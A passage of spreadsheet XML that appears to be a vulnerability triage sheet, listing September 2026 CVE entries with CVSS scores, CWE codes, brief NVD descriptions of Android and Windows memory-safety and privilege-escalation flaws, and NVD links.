r="Q440" s="5" t="inlineStr" /><c r="R440" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S440" s="5" t="inlineStr"><is><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is></c><c r="T440" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t></is></c></row><row r="441"><c r="A441" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C441" s="5" t="inlineStr"><is><t>CVE-2026-45520</t></is></c><c r="D441" s="5" t="n"><v>7.8</v></c><c r="E441" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F441" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G441" s="5" t="inlineStr" /><c r="H441" s="5" t="n"><v>0.001</v></c><c r="I441" s="5" t="inlineStr" /><c r="J441" s="5" t="inlineStr" /><c r="K441" s="5" t="inlineStr" /><c r="L441" s="5" t="inlineStr" /><c r="M441" s="5" t="inlineStr" /><c r="N441" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P441" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q441" s="5" t="inlineStr" /><c r="R441" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S441" s="5" t="inlineStr"><is><t>In onAttach of BiometricsSettingsBase.java, there is a possible authentication bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T441" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t></is></c></row><row r="442"><c r="A442" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C442" s="5" t="inlineStr"><is><t>CVE-2026-45531</t></is></c><c r="D442" s="5" t="n"><v>7.8</v></c><c r="E442" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F442" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G442" s="5" t="inlineStr" /><c r="H442" s="5" t="n"><v>0.001</v></c><c r="I442" s="5" t="inlineStr" /><c r="J442" s="5" t="inlineStr" /><c r="K442" s="5" t="inlineStr" /><c r="L442" s="5" t="inlineStr" /><c r="M442" s="5" t="inlineStr" /><c r="N442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P442" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q442" s="5" t="inlineStr" /><c r="R442" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S442" s="5" t="inlineStr"><is><t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T442" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t></is></c></row><row r="443"><c r="A443" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C443" s="5" t="inlineStr"><is><t>CVE-2026-49881</t></is></c><c r="D443" s="5" t="n"><v>7.8</v></c><c r="E443" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F443" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G443" s="5" t="inlineStr" /><c r="H443" s="5" t="n"><v>0.001</v></c><c r="I443" s="5" t="inlineStr" /><c r="J443" s="5" t="inlineStr" /><c r="K443" s="5" t="inlineStr" /><c r="L443" s="5" t="inlineStr" /><c r="M443" s="5" t="inlineStr" /><c r="N443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P443" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q443" s="5" t="inlineStr" /><c r="R443" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S443" s="5" t="inlineStr"><is><t>In serviceClassExists of InCallController.java, there is a possible arbitrary code execution due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T443" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t></is></c></row><row r="444"><c r="A444" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C444" s="5" t="inlineStr"><is><t>CVE-2026-49884</t></is></c><c r="D444" s="5" t="n"><v>7.8</v></c><c r="E444" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F444" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G444" s="5" t="inlineStr" /><c r="H444" s="5" t="n"><v>0.001</v></c><c r="I444" s="5" t="inlineStr" /><c r="J444" s="5" t="inlineStr" /><c r="K444" s="5" t="inlineStr" /><c r="L444" s="5" t="inlineStr" /><c r="M444" s="5" t="inlineStr" /><c r="N444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P444" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q444" s="5" t="inlineStr" /><c r="R444" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S444" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T444" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t></is></c></row><row r="445"><c r="A445" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C445" s="5" t="inlineStr"><is><t>CVE-2026-49887</t></is></c><c r="D445" s="5" t="n"><v>7.8</v></c><c r="E445" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F445" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G445" s="5" t="inlineStr" /><c r="H445" s="5" t="n"><v>0.001</v></c><c r="I445" s="5" t="inlineStr" /><c r="J445" s="5" t="inlineStr" /><c r="K445" s="5" t="inlineStr" /><c r="L445" s="5" t="inlineStr" /><c r="M445" s="5" t="inlineStr" /><c r="N445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P445" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q445" s="5" t="inlineStr" /><c r="R445" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S445" s="5" t="inlineStr"><is><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is></c><c r="T445" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t></is></c></row><row r="446"><c r="A446" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C446" s="5" t="inlineStr"><is><t>CVE-2026-49918</t></is></c><c r="D446" s="5" t="n"><v>7.8</v></c><c r="E446" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F446" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G446" s="5" t="inlineStr" /><c r="H446" s="5" t="n"><v>0.001</v></c><c r="I446" s="5" t="inlineStr" /><c r="J446" s="5" t="inlineStr" /><c r="K446" s="5" t="inlineStr" /><c r="L446" s="5" t="inlineStr" /><c r="M446" s="5" t="inlineStr" /><c r="N446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P446" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q446" s="5" t="inlineStr" /><c r="R446" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S446" s="5" t="inlineStr"><is><t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T446" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t></is></c></row><row r="447"><c r="A447" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C447" s="5" t="inlineStr"><is><t>CVE-2026-49919</t></is></c><c r="D447" s="5" t="n"><v>7.8</v></c><c r="E447" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F447" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G447" s="5" t="inlineStr" /><c r="H447" s="5" t="n"><v>0.001</v></c><c r="I447" s="5" t="inlineStr" /><c r="J447" s="5" t="inlineStr" /><c r="K447" s="5" t="inlineStr" /><c r="L447" s="5" t="inlineStr" /><c r="M447" s="5" t="inlineStr" /><c r="N447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P447" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q447" s="5" t="inlineStr" /><c r="R447" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S447" s="5" t="inlineStr"><is><t>In tt_face_colr_blend_layer of ttcolr.c, there is a possible remote code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T447" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t></is></c></row><row r="448"><c r="A448" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B448" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C448" s="5" t="inlineStr"><is><t>CVE-2026-49927</t></is></c><c r="D448" s="5" t="n"><v>7.8</v></c><c r="E448" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F448" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G448" s="5" t="inlineStr" /><c r="H448" s="5" t="n"><v>0.001</v></c><c r="I448" s="5" t="inlineStr" /><c r="J448" s="5" t="inlineStr" /><c r="K448" s="5" t="inlineStr" /><c r="L448" s="5" t="inlineStr" /><c r="M448" s="5" t="inlineStr" /><c r="N448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q448" s="5" t="inlineStr" /><c r="R448" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S448" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T448" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t></is></c></row><row r="449"><c r="A449" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C449" s="5" t="inlineStr"><is><t>CVE-2026-49932</t></is></c><c r="D449" s="5" t="n"><v>7.8</v></c><c r="E449" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F449" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G449" s="5" t="inlineStr" /><c r="H449" s="5" t="n"><v>0.001</v></c><c r="I449" s="5" t="inlineStr" /><c r="J449" s="5" t="inlineStr" /><c r="K449" s="5" t="inlineStr" /><c r="L449" s="5" t="inlineStr" /><c r="M449" s="5" t="inlineStr" /><c r="N449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q449" s="5" t="inlineStr" /><c r="R449" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S449" s="5" t="inlineStr"><is><t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t></is></c></row><row r="450"><c r="A450" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C450" s="5" t="inlineStr"><is><t>CVE-2026-55273</t></is></c><c r="D450" s="5" t="n"><v>7.8</v></c><c r="E450" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F450" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G450" s="5" t="inlineStr" /><c r="H450" s="5" t="n"><v>0.001</v></c><c r="I450" s="5" t="inlineStr" /><c r="J450" s="5" t="inlineStr" /><c r="K450" s="5" t="inlineStr" /><c r="L450" s="5" t="inlineStr" /><c r="M450" s="5" t="inlineStr" /><c r="N450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q450" s="5" t="inlineStr" /><c r="R450" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S450" s="5" t="inlineStr"><is><t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t></is></c></row><row r="451"><c r="A451" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B451" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C451" s="5" t="inlineStr"><is><t>CVE-2026-55285</t></is></c><c r="D451" s="5" t="n"><v>7.8</v></c><c r="E451" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F451" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G451" s="5" t="inlineStr" /><c r="H451" s="5" t="n"><v>0.001</v></c><c r="I451" s="5" t="inlineStr" /><c r="J451" s="5" t="inlineStr" /><c r="K451" s="5" t="inlineStr" /><c r="L451" s="5" t="inlineStr" /><c r="M451" s="5" t="inlineStr" /><c r="N451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q451" s="5" t="inlineStr" /><c r="R451" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S451" s="5" t="inlineStr"><is><t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t></is></c></row><row r="452"><c r="A452" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B452" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C452" s="5" t="inlineStr"><is><t>CVE-2026-55294</t></is></c><c r="D452" s="5" t="n"><v>7.8</v></c><c r="E452" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F452" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G452" s="5" t="inlineStr" /><c r="H452" s="5" t="n"><v>0.001</v></c><c r="I452" s="5" t="inlineStr" /><c r="J452" s="5" t="inlineStr" /><c r="K452" s="5" t="inlineStr" /><c r="L452" s="5" t="inlineStr" /><c r="M452" s="5" t="inlineStr" /><c r="N452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q452" s="5" t="inlineStr" /><c r="R452" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S452" s="5" t="inlineStr"><is><t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t></is></c></row><row r="453"><c r="A453" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B453" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C453" s="5" t="inlineStr"><is><t>CVE-2026-56172</t></is></c><c r="D453" s="5" t="n"><v>7.8</v></c><c r="E453" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F453" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G453" s="5" t="inlineStr" /><c r="H453" s="5" t="n"><v>0.003</v></c><c r="I453" s="5" t="inlineStr" /><c r="J453" s="5" t="inlineStr" /><c r="K453" s="5" t="inlineStr" /><c r="L453" s="5" t="inlineStr" /><c r="M453" s="5" t="inlineStr" /><c r="N453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q453" s="5" t="inlineStr" /><c r="R453" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S453" s="5" t="inlineStr"><is><t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T453" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t></is></c></row><row r="454"><c r="A454" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B454" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C454" s="5" t="inlineStr"><is><t>CVE-2026-56177</t></is></c><c r="D454" s="5" t="n"><v>7.8</v></c><c r="E454" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F454" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G454" s="5" t="inlineStr" /><c r="H454" s="5" t="n"><v>0.003</v></c><c r="I454" s="5" t="inlineStr" /><c r="J454" s="5" t="inlineStr" /><c r="K454" s="5" t="inlineStr" /><c r="L454" s="5" t="inlineStr" /><c r="M454" s="5" t="inlineStr" /><c r="N454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P454" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q454" s="5" t="inlineStr" /><c r="R454" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S454" s="5" t="inlineStr"><is><t>Use after free in Windows Server allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56177</t></is></c></row><row r="455"><c r="A455" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B455" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C455" s="5" t="inlineStr"><is><t>CVE-2026-56198</t></is></c><c r="D455" s="5" t="n"><v>7.8</v></c><c r="E455" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F455" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G455" s="5" t="inlineStr" /><c r="H455" s="5" t="n"><v>0.002</v></c><c r="I455" s="5" t="inlineStr" /><c r="J455" s="5" t="inlineStr" /><c r="K455" s="5" t="inlineStr" /><c r="L455" s="5" t="inlineStr" /><c r="M455" s="5" t="inlineStr" /><c r="N455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P455" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q455" s="5" t="inlineStr" /><c r="R455" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S455" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Trace Data Helper allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-56198</t></is></c></row><row r="456"><c r="A456" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B456" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C456" s="5" t="inlineStr"><is><t>CVE-2026-5729</t></is></c><c r="D456" s="5" t="n"><v>7.8</v></c><c r="E456" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F456" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G456" s="5" t="inlineStr" /><c r="H456" s="5" t="n"><v>0.001</v></c><c r="I456" s="5" t="inlineStr" /><c r="J456" s="5" t="inlineStr" /><c r="K456" s="5" t="inlineStr" /><c r="L456" s="5" t="inlineStr" /><c r="M456" s="5" t="inlineStr" /><c r="N456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P456" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q456" s="5" t="inlineStr" /><c r="R456" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S456" s="5" t="inlineStr"><is><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is></c><c r="T456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-5729</t></is></c></row><row r="457"><c r="A457" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B457" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C457" s="5" t="inlineStr"><is><t>CVE-2026-58599</t></is></c><c r="D457" s="5" t="n"><v>7.8</v></c><c r="E457" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F457" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G457" s="5" t="inlineStr" /><c r="H457" s="5" t="n"><v>0.003</v></c><c r="I457" s="5" t="inlineStr" /><c r="J457" s="5" t="inlineStr" /><c r="K457" s="5" t="inlineStr" /><c r="L457" s="5" t="inlineStr" /><c r="M457" s="5" t="inlineStr" /><c r="N457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P457" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q457" s="5" t="inlineStr" /><c r="R457" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S457" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t></is></c><c r="T457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58599</t></is></c></row><row r="458"><c r="A458" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C458" s="5" t="inlineStr"><is><t>CVE-2026-58600</t></is></c><c r="D458" s="5" t="n"><v>7.8</v></c><c r="E458" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F458" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G458" s="5" t="inlineStr" /><c r="H458" s="5" t="n"><v>0.003</v></c><c r="I458" s="5" t="inlineStr" /><c r="J458" s="5" t="inlineStr" /><c r="K458" s="5" t="inlineStr" /><c r="L458" s="5" t="inlineStr" /><c r="M458" s="5" t="inlineStr" /><c r="N458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P458" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q458" s="5" t="inlineStr" /><c r="R458" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S458" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to elevate privileges locally.</t></is></c><c r="T458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58600</t></is></c></row><row r="459"><c r="A459" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B459" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C459" s="5" t="inlineStr"><is><t>CVE-2026-58611</t></is></c><c r="D459" s="5" t="n"><v>7.8</v></c><c r="E459" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F459" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G459" s="5" t="inlineStr" /><c r="H459" s="5" t="n"><v>0.002</v></c><c r="I459" s="5" t="inlineStr" /><c r="J459" s="5" t="inlineStr" /><c r="K459" s="5" t="inlineStr"><is><t>microsoft:xbox_gaming_services</t></is></c><c r="L459" s="5" t="inlineStr" /><c r="M459" s="5" t="inlineStr" /><c r="N459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O459" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P459" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q459" s="5" t="inlineStr" /><c r="R459" s="5" t="inlineStr"><is><t>CWE-285</t></is></c><c r="S459" s="5" t="inlineStr"><is><t>Improper authorization in XBox Gaming Services allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58611</t></is></c></row><row r="460"><c r="A460" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B460" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C460" s="5" t="inlineStr"><is><t>CVE-2026-58820</t></is></c><c r="D460" s="5" t="n"><v>7.8</v></c><c r="E460" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F460" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G460" s="5" t="inlineStr" /><c r="H460" s="5" t="n"><v>0.001</v></c><c r="I460" s="5" t="inlineStr" /><c r="J460" s="5" t="inlineStr" /><c r="K460" s="5" t="inlineStr" /><c r="L460" s="5" t="inlineStr" /><c r="M460" s="5" t="inlineStr" /><c r="N460" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P460" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q460" s="5" t="inlineStr" /><c r="R460" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S460" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to integer overflow. This could lead to local escalation of privilege with no additional execution privileges required.</t></is></c><c r="T460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58820</t></is></c></row><row r="461"><c r="A461" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B461" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C461" s="5" t="inlineStr"><is><t>CVE-2026-58823</t></is></c><c r="D461" s="5" t="n"><v>7.8</v></c><c r="E461" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F461" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G461" s="5" t="inlineStr" /><c r="H461" s="5" t="n"><v>0.001</v></c><c r="I461" s="5" t="inlineStr" /><c r="J461" s="5" t="inlineStr" /><c r="K461" s="5" t="inlineStr" /><c r="L461" s="5" t="inlineStr" /><c r="M461" s="5" t="inlineStr" /><c r="N461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q461" s="5" t="inlineStr" /><c r="R461" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S461" s="5" t="inlineStr"><is><t>In stpropnci_process_std of stpropnci_std.cc, there is a possible memory safety issue due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58823</t></is></c></row><row r="462"><c r="A462" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B462" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C462" s="5" t="inlineStr"><is><t>CVE-2026-58839</t></is></c><c r="D462" s="5" t="n"><v>7.8</v></c><c r="E462" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F462" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G462" s="5" t="inlineStr" /><c r="H462" s="5" t="n"><v>0.001</v></c><c r="I462" s="5" t="inlineStr" /><c r="J462" s="5" t="inlineStr" /><c r="K462" s="5" t="inlineStr" /><c r="L462" s="5" t="inlineStr" /><c r="M462" s="5" t="inlineStr" /><c r="N462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q462" s="5" t="inlineStr" /><c r="R462" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S462" s="5" t="inlineStr"><is><t>In forEachLine of MountRegistry.cpp, there is a possible out of bounds read due to a buffer overflow. This could lead to local escalation of privilege with no additional 